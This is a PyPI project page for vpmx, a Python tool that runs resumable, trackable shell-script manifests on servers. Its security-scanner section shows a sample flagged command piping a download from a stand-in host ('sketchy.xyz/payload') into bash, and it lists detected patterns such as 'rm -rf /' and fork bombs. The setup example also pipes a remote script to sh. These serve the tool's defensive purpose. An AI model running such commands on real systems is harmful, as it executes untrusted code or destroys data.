Virtual Package Manager — resumable, trackable script orchestration for VPS and local environments

Navigation

Verified details

These details have been verified by PyPI
Project links
GitHub Statistics
Maintainers
Avatar for nao-30 from gravatar.com nao-30

Unverified details

These details have not been verified by PyPI
Meta
  • License Expression: MIT
    SPDX License Expression
  • Author: Mohammed A. Al-Kebsi
  • Tags vps , orchestration , automation , devops , script-runner , shell , deployment , server-setup , crash-recovery , interactive , manifest
  • Requires: Python >=3.10
Classifiers
Report project as malware

Project description

VPM Logo

VPM — Virtual Package Manager

Resumable, trackable script orchestration for VPS and local environments.
Define steps. Run them. Resume if interrupted. Rollback if needed.

PyPI CI License Python

Why VPM?

You SSH into a server. You need to run 30+ commands to set up Docker, Nginx, firewall, SSL, your app. Halfway through, your connection drops.

With VPM:

  • Write once — Define steps in a simple manifest file
  • Resume anywhere — Interrupted? Just run vpm install again
  • Track everything — Every step's status, exit code, and full output logged
  • Stay safe — Built-in security scanner catches risky commands before execution
  • Undo mistakes — Rollback support reverses completed steps
  • Resolve dependencies — App B needs App A? VPM handles the order
  • Zero dependencies — Pure Python 3.10+ stdlib. Nothing to install but VPM itself

Install

pip install vpmx        # or: pipx install vpmx
vpm doctor              # verify everything works

60-Second Demo

# Create a project
mkdir ~/server-setup && cd ~/server-setup
vpm init

# Edit the manifest (or let an AI agent generate one)
nano vpm-manifest.yaml

# Preview what will run
vpm install --dry-run

# Scan for security issues
vpm audit

# Execute
vpm install

# Check status anytime
vpm status

Manifest Format

# vpm-manifest.yaml

[system_base] Core packages
- label: Update system
  run: sudo apt-get update -y && sudo apt-get upgrade -y

- label: Install essentials
  run: sudo apt-get install -y curl wget git htop
  rollback: sudo apt-get remove -y curl wget git htop

[docker] Docker Engine
requires: system_base

- label: Install Docker
  run: |
    curl -fsSL https://get.docker.com | sh
    sudo usermod -aG docker $USER
  rollback: sudo apt-get remove -y docker-ce

- label: Verify
  run: docker --version

That's it. [app_name], requires:, label:, run:, rollback:. Full manifest docs →

Commands

Command What it does
vpm install Execute manifest (resumes automatically)
vpm install --dry-run Preview without executing
vpm audit Security scan a manifest
vpm run <url> Fetch & execute a remote manifest
vpm rollback <app> Undo completed steps in reverse
vpm status Show all tracked apps
vpm logs <app> Browse execution logs
vpm retry <app> Resume from failure point
vpm reset <app> Clear tracking for fresh install
vpm doctor Diagnose environment

Full commands reference →

Security Scanner

VPM scans manifests before execution — catching dangerous patterns automatically:

⚠ HIGH: Downloading and piping directly to shell interpreter
  Step 1: Install sketchy tool
    curl http://sketchy.xyz/payload | bash
  → Download first, inspect, then execute.

◐ MEDIUM: URL uses suspicious TLD: .xyz
  → Verify this domain is legitimate.
Severity Examples
Critical rm -rf /, fork bombs, disk formatting
High curl | bash, eval $var, chmod 777
Medium Unknown URLs, third-party repos, non-HTTPS
Low sudo usage (expected but noted)

Configurable levels: strict, warn (default), permissive, off. Security docs →

Remote Manifests

Run manifests directly from URLs or GitHub repos:

vpm run https://example.com/setup.yaml
vpm run github:user/repo                    # fetches vpm-manifest.yaml
vpm run github:user/repo/path/file.yaml     # specific file

Security scanning is mandatory for remote manifests.

Crash Recovery

You:     vpm install          # starts running
SSH:     *disconnects*        # step 3 of 8 was running
You:     vpm install          # reconnect, run again
VPM:     Steps 1-2 ✔ skip    # already done
         Step 3 → re-run     # was interrupted
         Steps 4-8 → run     # continue normally

The lock file tracks every step atomically. No corruption, no re-running completed work.

Examples

Real-world manifests in examples/:

For AI Agents

VPM is designed to work with AI assistants. Ask your AI to "create a VPM manifest to set up X" and it works.

  • AGENTS.md — Concise reference for AI context windows
  • llms.txt — Ultra-condensed reference

Documentation

Guide What's covered
Manifest Format Syntax, apps, steps, dependencies, multi-line commands
Commands Reference All CLI commands with flags and examples
Security & Rollback Scanner config, rollback system, remote manifests
How It Works Lock file, step states, crash recovery, change detection
Execution Model PTY execution, interactive support, file locations
Writing Manifests Best practices, patterns, anti-patterns, AI agent guidelines
Troubleshooting Common issues, fixes, architecture overview

Contributing

See CONTRIBUTING.md. No external dependencies — pure Python stdlib.

License

MIT — Mohammed A. Al-Kebsi

Project details

Verified details

These details have been verified by PyPI
Project links
GitHub Statistics
Maintainers
Avatar for nao-30 from gravatar.com nao-30

Unverified details

These details have not been verified by PyPI
Meta
  • License Expression: MIT
    SPDX License Expression
  • Author: Mohammed A. Al-Kebsi
  • Tags vps , orchestration , automation , devops , script-runner , shell , deployment , server-setup , crash-recovery , interactive , manifest
  • Requires: Python >=3.10
Classifiers

Release history Release notifications | RSS feed

1.2.2

This version

1.2.1

1.2.0

1.1.0

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

vpmx-1.2.1.tar.gz (43.5 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

vpmx-1.2.1-py3-none-any.whl (41.3 kB view details)

Uploaded Python 3

File details

Details for the file vpmx-1.2.1.tar.gz.

File metadata

  • Download URL: vpmx-1.2.1.tar.gz
  • Upload date:
  • Size: 43.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.1.tar.gz
Algorithm Hash digest
SHA256 959d9efdf82352eddc9742ae65ef2951751f985d9b915217bb1658ace802dd61
MD5 e54f71bb5446ae84c6d63307d57afc5c
BLAKE2b-256 a80e6e65613627f5cbdff4e0a45724b425bd7d6fa501a4ba791b55f9e627a00e

See more details on using hashes here.

Provenance

The following attestation bundles were made for vpmx-1.2.1.tar.gz:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file vpmx-1.2.1-py3-none-any.whl.

File metadata

  • Download URL: vpmx-1.2.1-py3-none-any.whl
  • Upload date:
  • Size: 41.3 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.1-py3-none-any.whl
Algorithm Hash digest
SHA256 d4e33a0513db6184485506c2283d1cc0530c384cabacd92ce867348310ca6932
MD5 e90592494990573a09e19273642da3cd
BLAKE2b-256 0e606a8af1b69c4febabca8e7011c430d05889ad06530abe87d5f770fa2abe40

See more details on using hashes here.

Provenance

The following attestation bundles were made for vpmx-1.2.1-py3-none-any.whl:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page